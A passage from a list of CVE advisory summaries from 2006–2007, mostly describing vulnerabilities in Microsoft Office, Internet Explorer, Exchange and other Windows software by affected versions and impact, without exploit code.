library buffer overflow and execute arbitrary code via a long host parameter, or have other unspecified impact. NOTE: it could be argued that this is an issue in mssql_connect (CVE-2007-1411.1) in PHP, or an issue in the ADOdb Library, and the proper fix should be in one of these products [CVE-2007-1981] The safevoid_vsnprintf function in Metamod-P 1.19p29 and earlier on Windows allows remote attackers to cause a denial of service (daemon crash) via a long meta list command. [CVE-2007-1911] Multiple unspecified vulnerabilities in Microsoft Word 2007 allow remote attackers to cause a denial of service (CPU consumption) via crafted documents, as demonstrated by (1) file798-1.doc and (2) file613-1.doc, possibly related to a buffer overflow. [CVE-2007-1910] Buffer overflow in wwlib.dll in Microsoft Word 2007 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a crafted document, as demonstrated by file789-1.doc. [CVE-2007-1876] VMware Workstation before 5.5.4, when running a 64-bit Windows guest on a 64-bit host, allows local users to "corrupt the virtual machine's register context" by debugging a local program and stepping into a "syscall instruction." [CVE-2007-1756] Microsoft Excel 2000 SP3, 2002 SP3, 2003 SP2, 2003 Viewer, and Office Excel 2007 does not properly validate version information, which allows user-assisted remote attackers to execute arbitrary code via a crafted Excel file, aka "Calculation Error Vulnerability". [CVE-2007-1754] PUBCONV.DLL in Microsoft Office Publisher 2007 does not properly clear memory when transferring data from disk to memory, which allows user-assisted remote attackers to execute arbitrary code via a malformed .pub page via a certain negative value, which bypasses a sanitization procedure that initializes critical pointers to NULL, aka the "Publisher Invalid Memory Reference Vulnerability". [CVE-2007-1751] Microsoft Internet Explorer 5.01, 6, and 7 allows remote attackers to execute arbitrary code by causing Internet Explorer to access an uninitialized or deleted object, related to prototype variables and table cells, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2007-1750] Unspecified vulnerability in Microsoft Internet Explorer 6 allows remote attackers to execute arbitrary code via a crafted Cascading Style Sheets (CSS) tag that triggers memory corruption. [CVE-2007-1747] Unspecified vulnerability in MSO.dll in Microsoft Office 2000 SP3, 2002 SP3, 2003 SP2, 2004 for Mac, and 2007 allows user-assisted remote attackers to execute arbitrary code via a malformed drawing object, which triggers memory corruption. [CVE-2007-1593] The administrative service in Symantec Veritas Volume Replicator (VVR) for Windows 3.1 through 4.3, and VVR for Unix 3.5 through 5.0, in Symantec Storage Foundation products allows remote attackers to cause a denial of service (memory consumption and service crash) via a crafted packet to the service port (8199/tcp) that triggers a request for more memory than available, which causes the service to write to an invalid pointer. [CVE-2007-1580] FTPDMIN 0.96 allows remote attackers to cause a denial of service (daemon crash) via a LIST command for a Windows drive letter, as demonstrated using "//A:". NOTE: this has been reported as a buffer overflow by some sources, but there is not a long argument. [CVE-2007-1538] * DISPUTED McAfee VirusScan Enterprise 8.5.0.i uses insecure permissions for certain Windows Registry keys, which allows local users to bypass local password protection via the UIP value in (1) HKEY_LOCAL_MACHINE\SOFTWARE\McAfee\DesktopProtection or (2) HKEY_LOCAL_MACHINE\SOFTWARE\Network Associates\TVD\VirusScan Entreprise\CurrentVersion. NOTE: this issue has been disputed by third-party researchers, stating that the default permissions for HKEY_LOCAL_MACHINE\SOFTWARE does not allow for write access and the product does not modify the inherited permissions. There might be an interaction error with another product. [CVE-2007-1405] Cross-site scripting (XSS) vulnerability in the "download wiki page as text" feature in Trac before 0.10.3.1, when Microsoft Internet Explorer is used, allows remote attackers to inject arbitrary web script or HTML via unspecified parameters. [CVE-2007-1382] The PHP COM extensions for PHP on Windows systems allow context-dependent attackers to execute arbitrary code via a WScript.Shell COM object, as demonstrated by using the Run method of this object to execute cmd.exe, which bypasses PHP's safe mode. [CVE-2007-1281] Kaspersky AntiVirus Engine 6.0.1.411 for Windows and 5.5-10 for Linux allows remote attackers to cause a denial of service (CPU consumption) via a crafted UPX compressed file with a negative offset, which triggers an infinite loop during decompression. [CVE-2007-1278] Unspecified vulnerability in the IIS connector in Adobe JRun 4.0 Updater 6, and ColdFusion MX 6.1 and 7.0 Enterprise, when using Microsoft IIS 6, allows remote attackers to cause a denial of service via unspecified vectors, involving the request of a file in the JRun web root. [CVE-2007-1262] Multiple cross-site scripting (XSS) vulnerabilities in the HTML filter in SquirrelMail 1.4.0 through 1.4.9a allow remote attackers to inject arbitrary web script or HTML via the (1) data: URI in an HTML e-mail attachment or (2) various non-ASCII character sets that are not properly filtered when viewed with Microsoft Internet Explorer. [CVE-2007-1239] Microsoft Excel 2003 does not properly parse .XLS files, which allows remote attackers to cause a denial of service (application crash) via a file with a (1) corrupted XML format or a (2) corrupted XLS format, which triggers a NULL pointer dereference. [CVE-2007-1238] Microsoft Office 2003 allows user-assisted remote attackers to cause a denial of service (application crash) by attempting to insert a corrupted WMF file. [CVE-2007-1221] The Hypervisor in Microsoft Xbox 360 kernel 4532 and 4548 allows attackers with physical access to force execution of the hypervisor syscall with a certain register set, which bypasses intended code protection. [CVE-2007-1220] The Hypervisor in Microsoft Xbox 360 kernel 4532 and 4548 does not properly verify the parameters passed to the syscall dispatcher, which allows attackers with physical access to bypass code-signing requirements and execute arbitrary code. [CVE-2007-1214] Microsoft Excel 2000 SP3, 2002 SP3, 2003 SP2, 2003 Viewer, and 2004 for Mac allows user-assisted remote attackers to execute arbitrary code via a crafted AutoFilter filter record in an Excel BIFF8 format XLS file, which triggers memory corruption. [CVE-2007-1203] Unspecified vulnerability in Microsoft Excel 2000 SP3, 2002 SP3, 2003 SP2, 2003 Viewer, 2004 for Mac, and 2007 allows user-assisted remote attackers to execute arbitrary code via a crafted set font value in an Excel file, which results in memory corruption. [CVE-2007-1202] Word (or Word Viewer) in Microsoft Office 2000 SP3, XP SP3, 2003 SP2, 2004 for Mac, and Works Suite 2004, 2005, and 2006 does not properly parse certain rich text "property strings of certain control words," which allows user-assisted remote attackers to trigger heap corruption and execute arbitrary code, aka the "Word RTF Parsing Vulnerability." [CVE-2007-1201] Unspecified vulnerability in certain COM objects in Microsoft Office Web Components 2000 allows user-assisted remote attackers to execute arbitrary code via vectors related to DataSource that trigger memory corruption, aka "Office Web Components DataSource Vulnerability." [CVE-2007-1196] Unspecified vulnerability in Citrix Presentation Server Client for Windows before 10.0 allows remote web sites to execute arbitrary code via unspecified vectors, related to the implementation of ICA connectivity through proxy servers. [CVE-2007-1117] Unspecified vulnerability in Publisher 2007 in Microsoft Office 2007 allows remote attackers to execute arbitrary code via unspecified vectors, related to a "file format vulnerability." NOTE: this information is based upon a vague pre-advisory with no actionable information. However, the advisory is from a reliable source. [CVE-2007-1114] The child frames in Microsoft Internet Explorer 7 inherit the default charset from the parent window when a charset is not specified in an HTTP Content-Type header or META tag, which allows remote attackers to conduct cross-site scripting (XSS) attacks, as demonstrated using the UTF-7 character set. [CVE-2007-1094] Microsoft Internet Explorer 7 allows remote attackers to cause a denial of service (NULL dereference and application crash) via JavaScript onUnload handlers that modify the structure of a document. [CVE-2007-1091] Microsoft Internet Explorer 7 allows remote attackers to prevent users from leaving a site, spoof the address bar, and conduct phishing and other attacks via onUnload Javascript handlers. [CVE-2007-1083] Buffer overflow in the Configuration Checker (ConfigChk) ActiveX control in VSCnfChk.dll 2.0.0.2 for Verisign Managed PKI Service, Secure Messaging for Microsoft Exchange, and Go Secure! allows remote attackers to execute arbitrary code via long arguments to the VerCompare method. [CVE-2007-1070] Multiple stack-based buffer overflows in Trend Micro ServerProtect for Windows and EMC 5.58, and for Network Appliance Filer 5.61 and 5.62, allow remote attackers to execute arbitrary code via crafted RPC requests to TmRpcSrv.dll that trigger overflows when calling the (1) CMON_NetTestConnection, (2) CMON_ActiveUpdate, and (3) CMON_ActiveRollback functions in (a) StCommon.dll, and (4) ENG_SetRealTimeScanConfigInfo and (5) ENG_SendEMail functions in (b) eng50.dll. [CVE-2007-1069] The memory management in VMware Workstation before 5.5.4 allows attackers to cause a denial of service (Windows virtual machine crash) by triggering certain general protection faults (GPF). [CVE-2007-0948] Heap-based buffer overflow in Microsoft Virtual PC 2004 and PC for Mac 7.1 and 7, and Virtual Server 2005 and 2005 R2, allows local guest OS administrators to execute arbitrary code on the host OS via unspecified vectors related to "interaction and initialization of components." [CVE-2007-0940] Unspecified vulnerability in the Cryptographic API Component Object Model Certificates ActiveX control (CAPICOM.dll) in Microsoft CAPICOM and BizTalk Server 2004 SP1 and SP2 allows remote attackers to execute arbitrary code via unspecified vectors, aka the "CAPICOM.Certificates Vulnerability." [CVE-2007-0939] Cross-site scripting (XSS) vulnerability in Microsoft Content Management Server (MCMS) 2001 SP1 and 2002 SP2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving HTML redirection queries, aka "Cross-site Scripting and Spoofing Vulnerability." [CVE-2007-0938] Microsoft Content Management Server (MCMS) 2001 SP1 and 2002 SP2 does not properly handle certain characters in a crafted HTTP GET request, which allows remote attackers to execute arbitrary code, aka the "CMS Memory Corruption Vulnerability." [CVE-2007-0936] Multiple unspecified vulnerabilities in Microsoft Visio 2002 allow remote user-assisted attackers to execute arbitrary code via a Visio (.VSD, VSS, .VST) file with a crafted packed object that triggers memory corruption, aka "Visio Document Packaging Vulnerability." [CVE-2007-0934] Unspecified vulnerability in Microsoft Visio 2002 allows remote user-assisted attackers to execute arbitrary code via a Visio (.VSD, VSS, .VST) file with a crafted version number that triggers memory corruption. [CVE-2007-0933] Buffer overflow in the wireless driver 6.0.0.18 for D-Link DWL-G650+ (Rev. A1) on Windows XP allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a beacon frame with a long TIM Information Element. [CVE-2007-0913] Unspecified vulnerability in Microsoft Powerpoint allows remote user-assisted attackers to execute arbitrary code via unknown attack vectors, as exploited by Trojan.PPDropper.G. NOTE: as of 20070213, it is not clear whether this is the same issue as CVE-2006-5296, CVE-2006-4694, CVE-2006-3876, CVE-2006-3877, or older issues. [CVE-2007-0870] Unspecified vulnerability in Microsoft Word 2000 allows remote attackers to cause a denial of service (crash) via unknown vectors, a different vulnerability than CVE-2006-5994, CVE-2006-6456, CVE-2006-6561, and CVE-2007-0515, a variant of Exploit-MS06-027. [CVE-2007-0842] The 64-bit versions of Microsoft Visual C++ 8.0 standard library (MSVCR80.DLL) time functions, including (1) localtime, (2) localtime_s, (3) gmtime, (4) gmtime_s, (5) ctime, (6) ctime_s, (7) wctime, (8) wctime_s, and (9) fstat, trigger an assertion error instead of a NULL pointer or EINVAL when processing a time argument later than Jan 1, 3000, which might allow context-dependent attackers to cause a denial of service (application exit) via large time values. NOTE: it could be argued that this is a design limitation of the functions, and the vulnerability lies with any application that does not validate arguments to these functions. However, this behavior is inconsistent with documentation, which does not list assertions as a possible result of an error condition. [CVE-2007-0780] browser.js in Mozilla Firefox 1.5.x before 1.5.0.10 and 2.x before 2.0.0.2, and SeaMonkey before 1.0.8 uses the requesting URI to identify child windows, which allows remote attackers to conduct cross-site scripting (XSS) attacks by opening a blocked popup originating from a javascript: URI in combination with multiple frames having the same data: URI. [CVE-2007-0711] Integer overflow in Apple QuickTime before 7.1.5, when installed on Windows operating systems, allows remote user-assisted attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted 3GP video file. [CVE-2007-0685] Internet Explorer on Windows Mobile 5.0 and Windows Mobile 2003 and 2003SE for Smartphones and PocketPC allows attackers to cause a denial of service (application crash and device instability) via unspecified vectors, possibly related to a buffer overflow. [CVE-2007-0678] SQL injection vulnerability in windows.asp in Fullaspsite Asp Hosting Sitesi allows remote attackers to execute arbitrary SQL commands via the kategori_id parameter. [CVE-2007-0674] Pictures and Videos on Windows Mobile 5.0 and Windows Mobile 2003 and 2003SE for Smartphones and PocketPC allows user-assisted remote attackers to cause a denial of service (device hang) via a malformed JPEG file. [CVE-2007-0671] Unspecified vulnerability in Microsoft Excel 2000, XP, 2003, and 2004 for Mac, and possibly other Office products, allows remote user-assisted attackers to execute arbitrary code via unknown attack vectors, as demonstrated by Exploit-MSExcel.h in targeted zero-day attacks. [CVE-2007-0515] Unspecified vulnerability in Microsoft Word allows user-assisted remote attackers to execute arbitrary code on Word 2000, and cause a denial of service on Word 2003, via unknown attack vectors that trigger memory corruption, as exploited by Trojan.Mdropper.W and later by Trojan.Mdropper.X, a different issue than CVE-2006-6456, CVE-2006-5994, and CVE-2006-6561. [CVE-2007-0468] Stack-based buffer overflow in rcdll.dll in msdev.exe in Visual C++ (MSVC) in Microsoft Visual Studio 6.0 SP6 allows user-assisted remote attackers to execute arbitrary code via a long file path in the "1 TYPELIB MOVEABLE PURE" option in an RC file. [CVE-2007-0466] Telestream Flip4Mac Windows Media Components for Quicktime 2.1.0.33 allows remote attackers to execute arbitrary code via a crafted ASF_File_Properties_Object size field in a WMV file, which triggers memory corruption. [CVE-2007-0454] Format string vulnerability in the afsacl.so VFS module in Samba 3.0.6 through 3.0.23d allows context-dependent attackers to execute arbitrary code via format string specifiers in a filename on an AFS file system, which is not properly handled during Windows ACL mapping. [CVE-2007-0427] Stack-based buffer overflow in Microsoft Help Workshop 4.03.0002 allows user-assisted remote attackers to execute arbitrary code via a help project (.HPJ) file with a long HLP field in the OPTIONS section. [CVE-2007-0352] Stack-based buffer overflow in Microsoft Help Workshop 4.03.0002 allows user-assisted remote attackers to execute arbitrary code via a crafted .cnt file composed of lines that begin with an integer followed by a space and a long string. [CVE-2007-0341] Cross-site scripting (XSS) vulnerability in phpMyAdmin 2.8.1 and earlier, when Microsoft Internet Explorer 6 is used, allows remote attackers to inject arbitrary web script or HTML via a javascript: URI in a CSS style in the convcharset parameter to the top-level URI, a different vulnerability than CVE-2005-0992. [CVE-2007-0221] Integer overflow in the IMAP (IMAP4) support in Microsoft Exchange Server 2000 SP3 allows remote attackers to cause a denial of service (service hang) via crafted literals in an IMAP command, aka the "IMAP Literal Processing Vulnerability." [CVE-2007-0220] Cross-site scripting (XSS) vulnerability in Outlook Web Access (OWA) in Microsoft Exchange Server 2000 SP3, and 2003 SP1 and SP2 allows remote attackers to execute arbitrary scripts, spoof content, or obtain sensitive information via certain UTF-encoded, script-based e-mail attachments, involving an "incorrectly handled UTF character set label". [CVE-2007-0219] Microsoft Internet Explorer 5.01, 6, and 7 uses certain COM objects from (1) Msb1fren.dll, (2) Htmlmm.ocx, and (3) Blnmgrps.dll as ActiveX controls, which allows remote attackers to execute arbitrary code via unspecified vectors, a different issue than CVE-2006-4697. [CVE-2007-0218] Microsoft Internet Explorer 5.01 and 6 allows remote attackers to execute arbitrary code by instantiating certain COM objects from Urlmon.dll, which triggers memory corruption during a call to the IObjectSafety function. [CVE-2007-0217] The wininet.dll FTP client code in Microsoft Internet Explorer 5.01 and 6 might allow remote attackers to execute arbitrary code via an FTP server response of a specific length that causes a terminating null byte to be written outside of a buffer, which causes heap corruption. [CVE-2007-0216] wkcvqd01.dll in Microsoft Works 6 File Converter, as used in Office 2003 SP2, Works 8.0, and Works Suite 2005, allows remote attackers to execute arbitrary code via a .wps file with crafted section length headers, aka "Microsoft Works File Converter Input Validation Vulnerability." [CVE-2007-0215] Stack-based buffer overflow in Microsoft Excel 2000 SP3, 2002 SP3, 2003 SP2, and 2003 Viewer allows user-assisted remote attackers to execute arbitrary code via a .XLS BIFF file with a malformed Named Graph record, which results in memory corruption. [CVE-2007-0213] Microsoft Exchange Server 2000 SP3, 2003 SP1 and SP2, and 2007 does not properly decode certain MIME encoded e-mails, which allows remote attackers to execute arbitrary code via a crafted base64-encoded MIME e-mail message. [CVE-2007-0209] Microsoft Word in Office 2000 SP3, XP SP3, Office 2003 SP2, Works Suite 2004 to 2006, and Office 2004 for Mac allows user-assisted remote attackers to execute arbitrary code via a Word file with a malformed drawing object, which leads to memory corruption. [CVE-2007-0208] Microsoft Word in Office 2000 SP3, XP SP3, Office 2003 SP2, Works Suite 2004 to 2006, and Office 2004 for Mac does not correctly check the properties of certain documents and warn the user of macro content, which allows user-assisted remote attackers to execute arbitrary code. [CVE-2007-0125] Kaspersky Labs Antivirus Engine 6.0 for Windows and 5.5-10 for Linux before 20070102 enter an infinite loop upon encountering an invalid NumberOfRvaAndSizes value in the Optional Windows Header of a portable executable (PE) file, which allows remote attackers to cause a denial of service (CPU consumption) by scanning a crafted PE file. [CVE-2007-0111] Buffer overflow in Resco Photo Viewer for PocketPC 4.11 and 6.01, as used in mobile devices running Windows Mobile 5.0, 2003, and 2003SE, allows remote attackers to execute arbitrary code via a crafted PNG image. [CVE-2007-0108] nwgina.dll in Novell Client 4.91 SP3 for Windows 2000/XP/2003 does not delete user profiles during a Terminal Service or Citrix session, which allows remote authenticated users to invoke alternate user profiles. [CVE-2007-0105] Stack-based buffer overflow in the CSAdmin service in Cisco Secure Access Control Server (ACS) for Windows before 4.1 and ACS Solution Engine before 4.1 allows remote attackers to execute arbitrary code via a crafted HTTP GET request. [CVE-2007-0099] Race condition in the msxml3 module in Microsoft XML Core Services 3.0, as used in Internet Explorer 6 and other applications, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via many nested tags in an XML document in an IFRAME, when synchronous document rendering is frequently disrupted with asynchronous events, as demonstrated using a JavaScript timer, which can trigger NULL pointer dereferences or memory corruption, aka "MSXML Memory Corruption Vulnerability." [CVE-2007-0087] DISPUTED ** Microsoft Internet Information Services (IIS), when accessed through a TCP connection with a large window size, allows remote attackers to cause a denial of service (network bandwidth consumption) via a Range header that specifies multiple copies of the same fragment. NOTE: the severity of this issue has been disputed by third parties, who state that the large window size required by the attack is not normally supported or configured by the server, or that a DDoS-style attack would accomplish the same goal. [CVE-2007-0060] Stack-based buffer overflow in the Message Queuing Server (Cam.exe) in CA (formerly Computer Associates) Message Queuing (CAM / CAFT) software before 1.11 Build 54_4 on Windows and NetWare, as used in CA Advantage Data Transport, eTrust Admin, certain BrightStor products, certain CleverPath products, and certain Unicenter products, allows remote attackers to execute arbitrary code via a crafted message to TCP port 3104. [CVE-2007-0047] CRLF injection vulnerability in Adobe Acrobat Reader Plugin before 8.0.0, when used with the Microsoft.XMLHTTP ActiveX object in Internet Explorer, allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via CRLF sequences in the javascript: URI in the (1) FDF, (2) XML, or (3) XFDF AJAX request parameters. [CVE-2007-0039] The Exchange Collaboration Data Objects (EXCDO) functionality in Microsoft Exchange Server 2000 SP3, 2003 SP1 and SP2, and 2007 allows remote attackers to cause a denial of service (crash) via an Internet Calendar (iCal) file containing multiple X-MICROSOFT-CDO-MODPROPS (MODPROPS) properties in which the second MODPROPS is longer than the first, which triggers a NULL pointer dereference and an unhandled exception. [CVE-2007-0035] Word (or Word Viewer) in Microsoft Office 2000 SP3, XP SP3, 2003 SP2, 2004 for Mac, and Works Suite 2004, 2005, and 2006 does not properly handle data in a certain array, which allows user-assisted remote attackers to execute arbitrary code, aka the "Word Array Overflow Vulnerability." [CVE-2007-0034] Buffer overflow in the Advanced Search (Finder.exe) feature of Microsoft Outlook 2000, 2002, and 2003 allows user-assisted remote attackers to execute arbitrary code via a crafted Outlook Saved Searches (OSS) file that triggers memory corruption, aka "Microsoft Outlook Advanced Find Vulnerability." [CVE-2007-0033] Microsoft Outlook 2002 and 2003 allows user-assisted remote attackers to execute arbitrary code via a malformed VEVENT record in an .iCal meeting request or ICS file. [CVE-2007-0031] Heap-based buffer overflow in Microsoft Excel 2000 SP3, 2002 SP3, 2003 SP2, 2004 for Mac, and v.X for Mac allows user-assisted remote attackers to execute arbitrary code via a BIFF8 spreadsheet with a PALETTE record that contains a large number of entries. [CVE-2007-0030] Microsoft Excel 2000 SP3, 2002 SP3, 2003 SP2, 2004 for Mac, and v.X for Mac allows user-assisted remote attackers to execute arbitrary code via an Excel file with an out-of-range Column field in certain BIFF8 record types, which references arbitrary memory. [CVE-2007-0029] Microsoft Excel 2000 SP3, 2002 SP3, 2003 SP2, 2004 for Mac, and v.X for Mac allows user-assisted remote attackers to execute arbitrary code via a malformed string, aka "Excel Malformed String Vulnerability." [CVE-2007-0028] Microsoft Excel 2000, 2002, 2003, Viewer 2003, Office 2004 for Mac, and Office v.X for Mac does not properly handle certain opcodes, which allows user-assisted remote attackers to execute arbitrary code via a crafted XLS file, which results in an "Improper Memory Access Vulnerability." NOTE: an early disclosure of this issue used CVE-2006-3432, but only CVE-2007-0028 should be used. [CVE-2007-0027] Microsoft Excel 2000 SP3, 2002 SP3, 2003 SP2, 2004 for Mac, and v.X for Mac allows remote attackers to execute arbitrary code via malformed IMDATA records that trigger memory corruption. [CVE-2006-7192] Microsoft ASP .NET Framework 2.0.50727.42 does not properly handle comment (/* /) enclosures, which allows remote attackers to bypass request filtering and conduct cross-site scripting (XSS) attacks, or cause a denial of service, as demonstrated via an xss:expression STYLE attribute in a closing XSS HTML tag. [CVE-2006-7065] Microsoft Internet Explorer allows remote attackers to cause a denial of service (crash) via an IFRAME with a certain XML file and XSL stylesheet that triggers a crash in mshtml.dll when a refresh is called, probably a null pointer dereference. [CVE-2006-7031] Microsoft Internet Explorer 6.0.2900 SP2 and earlier allows remote attackers to cause a denial of service (crash) via a table element with a CSS attribute that sets the position, which triggers an "unhandled exception" in mshtml.dll. [CVE-2006-7030] Microsoft Internet Explorer 6 SP2 and earlier allows remote attackers to cause a denial of service (crash) via certain malformed HTML, possibly involving applet and base tags without required arguments, which triggers a null pointer dereference in mshtml.dll. [CVE-2006-7029] Microsoft Internet Explorer 6 SP2 and earlier allows remote attackers to cause a denial of service (crash) via a frameset with only one frame that calls resizeTo with certain arguments. NOTE: this issue might be related to CVE-2006-3637. [CVE-2006-7027] Microsoft Internet Security and Acceleration (ISA) Server 2004 logs unusual ASCII characters in the Host header, including the tab, which allows remote attackers to manipulate portions of the log file and possibly leverage this for other attacks. [CVE-2006-6971] Mozilla Firefox 2.0, possibly only when running on Windows, allows remote attackers to bypass the Phishing Protection mechanism by representing an IP address in (1) dotted-hex, (2) dotted-octal, (3) single decimal integer, (4) single hex integer, or (5) single octal integer format, which is not captured by the blacklist filter. [CVE-2006-6956] Microsoft Internet Explorer allows remote attackers to cause a denial of service (crash) via a web page that contains a large number of nested marquee tags, a related issue to CVE-2006-2723. [CVE-2006-6908] Buffer overflow in the Bluetooth Stack COM Server in the Widcomm Bluetooth stack, as packaged as Widcomm Stack 3.x and earlier on Windows, Widcomm BTStackServer 1.4.2.10 and 1.3.2.7 on Windows, Widcomm Bluetooth Communication Software 1.4.1.03 on Windows, and the Bluetooth implementation in Windows Mobile or Windows CE on the HP IPAQ 2215 and 5450, allows remote attackers to cause a denial of service (service crash) and possibly execute arbitrary code via unspecified vectors. [CVE-2006-6898] Widcomm Bluetooth for Windows (BTW) before 4.0.1.1500 allows remote attackers to listen to and record conversations, aka the CarWhisperer attack. [CVE-2006-6897] Directory traversal vulnerability in Widcomm Bluetooth for Windows (BTW) 3.0.1.905 allows remote attackers to conduct unauthorized file operations via a .. (dot dot) in an unspecified parameter. [CVE-2006-6853] Buffer overflow in Durian Web Application Server 3.02 freeware on Windows allows remote attackers to execute arbitrary code via a long string in a crafted packet to TCP port 4002. [CVE-2006-6714] Multiple memory leaks in Hitachi Directory Server 2 P-2444-A124 before 02-11-/K on Windows, and P-1B44-A121 before 02-10-/V on HP-UX, allow remote attackers to cause a denial of service (memory consumption) via invalid LDAP requests. [CVE-2006-6713] Buffer overflow in Hitachi Directory Server 2 P-2444-A124 before 02-11-/K on Windows, and P-1B44-A121 before 02-10-/V on HP-UX, allows remote attackers to execute arbitrary code via crafted LDAP requests. [CVE-2006-6617] projectserver/logon/pdsrequest.asp in Microsoft Project Server 2003 allows remote authenticated users to obtain the MSProjectUser password for a SQL database via a GetInitializationData request, which includes the information in the UserName and Password tags of the response. [CVE-2006-6578] Microsoft Internet Information Services (IIS) 5.1 permits the IUSR_Machine account to execute non-EXE files such as .COM files, which allows attackers to execute arbitrary commands via arguments to any .COM file that executes those arguments, as demonstrated using win.com when it is in a web directory with certain permissions. [CVE-2006-6561] Unspecified vulnerability in Microsoft Word 2000, 2002, and Word Viewer 2003 allows user-assisted remote attackers to execute arbitrary code via a crafted DOC file that triggers memory corruption, as demonstrated via the 12122006-djtest.doc file, a different issue than CVE-2006-5994 and CVE-2006-6456. [CVE-2006-6500] Heap-based buffer overflow in Mozilla Firefox 2.x before 2.0.0.1, 1.5.x before 1.5.0.9, Thunderbird before 1.5.0.9, and SeaMonkey before 1.0.7 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code by setting the CSS cursor to certain images that cause an incorrect size calculation when converting to a Windows bitmap. [CVE-2006-6458] The Trend Micro scan engine before 8.320 for Windows and before 8.150 on HP-UX and AIX, as used in Trend Micro PC Cillin - Internet Security 2006, Office Scan 7.3, and Server Protect 5.58, allows remote attackers to cause a denial of service (CPU consumption and system hang) via a malformed RAR archive with an Archive Header section with the head_size and pack_size fields set to zero, which triggers an infinite loop. [CVE-2006-6456] Unspecified vulnerability in Microsoft Word 2000, 2002, and 2003 and Word Viewer 2003 allows remote attackers to execute code via unspecified vectors related to malformed data structures that trigger memory corruption, a different vulnerability than CVE-2006-5994. [CVE-2006-6443] Buffer overflow in the Novell Distributed Print Services (NDPS) Print Provider for Windows component (NDPPNT.DLL) in Novell Client 4.91 has unknown impact and remote attack vectors. [CVE-2006-6427] The Web User Interface in Xerox WorkCentre and WorkCentre Pro before 12.060.17.000, 13.x before 13.060.17.000, and 14.x before 14.060.17.000 allows remote attackers to execute arbitrary commands via unspecified vectors involving "command injection" in (1) the TCP/IP hostname, (2) Scan-to-mailbox folder names, and (3) certain parameters in the Microsoft Networking configuration. NOTE: vector 1 might be the same as CVE-2006-5290. [CVE-2006-6334] Heap-based buffer overflow in the SendChannelData function in wfica.ocx in Citrix Presentation Server Client before 9.230 for Windows allows remote malicious web sites to execute arbitrary code via a DataSize parameter that is less than the length of the Data buffer. [CVE-2006-6311] Microsoft Internet Explorer 6.0.2900.2180 allows remote attackers to cause a denial of service via a style attribute in an HTML table tag with a width value that is dynamically calculated using JavaScript. [CVE-2006-6310] Microsoft Internet Explorer 6.0 SP1 and earlier allows remote attackers to cause a denial of service (crash) via an invalid src attribute value ("?") in an HTML frame tag that is in a frameset tag with a large rows attribute. NOTE: The provenance of this information is unknown [CVE-2006-6308] * DISPUTED Symantec LiveState 7.1 Agent for Windows allows local users to gain privileges by stopping the shstart.exe process and open "Web Self-Service" from the system tray icon, which will open a browser window running with elevated privileges. NOTE: several third-party researchers have noted that administrator privileges may be necessary to terminate shstart.exe. If this is the case, then no privilege escalation occurs, and this is not a vulnerability. [CVE-2006-6307] srvloc.sys in Novell Client for Windows before 4.91 SP3 allows remote attackers to cause an unspecified denial of service via a crafted packet to port 427 that triggers an access of pageable or invalid addresses using a higher interrupt request level (IRQL) than necessary. [CVE-2006-6133] Stack-based buffer overflow in Visual Studio Crystal Reports for Microsoft Visual Studio .NET 2002 and 2002 SP1, .NET 2003 and 2003 SP1, and 2005 and 2005 SP1 (formerly Business Objects Crystal Reports XI Professional) allows user-assisted remote attackers to execute arbitrary code via a crafted RPT file. [CVE-2006-6120] Integer overflow in the KPresenter import filter for Microsoft PowerPoint files (filters/olefilters/lib/klaola.cc) in KOffice before 1.6.1 allows user-assisted remote attackers to execute arbitrary code via a crafted PPT file, which results in a heap-based buffer overflow. [CVE-2006-5994] Unspecified vulnerability in Microsoft Word 2000 and 2002, Office Word and Word Viewer 2003, Word 2004 and 2004 v. X for Mac, and Works 2004, 2005, and 2006 allows remote attackers to execute arbitrary code via a Word document with a malformed string that triggers memory corruption, a different vulnerability than CVE-2006-6456. [CVE-2006-5988] Unspecified vulnerability in Windows 2000 Advanced Server SP4 running Active Directory allows remote attackers to cause a denial of service via unknown vectors, as demonstrated by a certain VulnDisco Pack module. NOTE: the provenance of this information is unknown [CVE-2006-5961] Buffer overflow in Mercury Mail Transport System 4.01b for Windows has unknown impact and attack vectors, as originally reported in a GLEG VulnDisco pack. NOTE: the provenance of this information is unknown [CVE-2006-5913] Microsoft Internet Explorer 7 allows remote attackers to (1) cause a security certificate from a secure web site to appear invalid via a link to res://ieframe.dll/sslnavcancel.htm with the target site in the anchor identifier, which displays the site's URL in the address bar but causes Internet Explorer to report that the certificate is invalid, or (2) trigger a "The webpage no longer exists" report via a link to res://ieframe.dll/http_410.htm, a variant of CVE-2006-5805. [CVE-2006-5884] Multiple unspecified vulnerabilities in DirectAnimation ActiveX controls for Microsoft Internet Explorer 5.01 through 6 have unknown impact and remote attack vectors, possibly related to (1) Danim.dll and (2) Lmrt.dll, a different set of vulnerabilities than CVE-2006-4446 and CVE-2006-4777. [CVE-2006-5858] Adobe ColdFusion MX 7 through 7.0.2, and JRun 4, when run on Microsoft IIS, allows remote attackers to read arbitrary files, list directories, or read source code via a double URL-encoded NULL byte in a ColdFusion filename, such as a CFM file. [CVE-2006-5850] Stack-based buffer overflow in Essentia Web Server 2.15 for Windows allows remote attackers to execute arbitrary code via a long URI, as demonstrated by a GET or HEAD request. NOTE: some of these details are obtained from third party information. [CVE-2006-5805] Microsoft Internet Explorer 7 allows remote attackers to cause a security certificate from a secure web site to appear invalid via a link to res://ieframe.dll/invalidcert.htm with the target site as an argument, which displays the site's URL in the address bar but causes Internet Explorer to report that the certificate is invalid. [CVE-2006-5581] Unspecified vulnerability in Microsoft Internet Explorer 6 allows remote attackers to execute arbitrary code via certain DHTML script functions, such as normalize, and "incorrectly created elements" that trigger memory corruption, aka "DHTML Script Function Memory Corruption Vulnerability." [CVE-2006-5579] Microsoft Internet Explorer 6 allows remote attackers to execute arbitrary code by using JavaScript to cause certain errors simultaneously, which results in the access of previously freed memory, aka "Script Error Handling Memory Corruption Vulnerability." [CVE-2006-5578] Microsoft Internet Explorer 6 and earlier allows remote attackers to read Temporary Internet Files (TIF) and obtain sensitive information via unspecified vectors involving certain drag and drop operations, aka "TIF Folder Information Disclosure Vulnerability," and a different issue than CVE-2006-5577. [CVE-2006-5577] Microsoft Internet Explorer 6 and earlier allows remote attackers to obtain sensitive information via unspecified uses of the OBJECT HTML tag, which 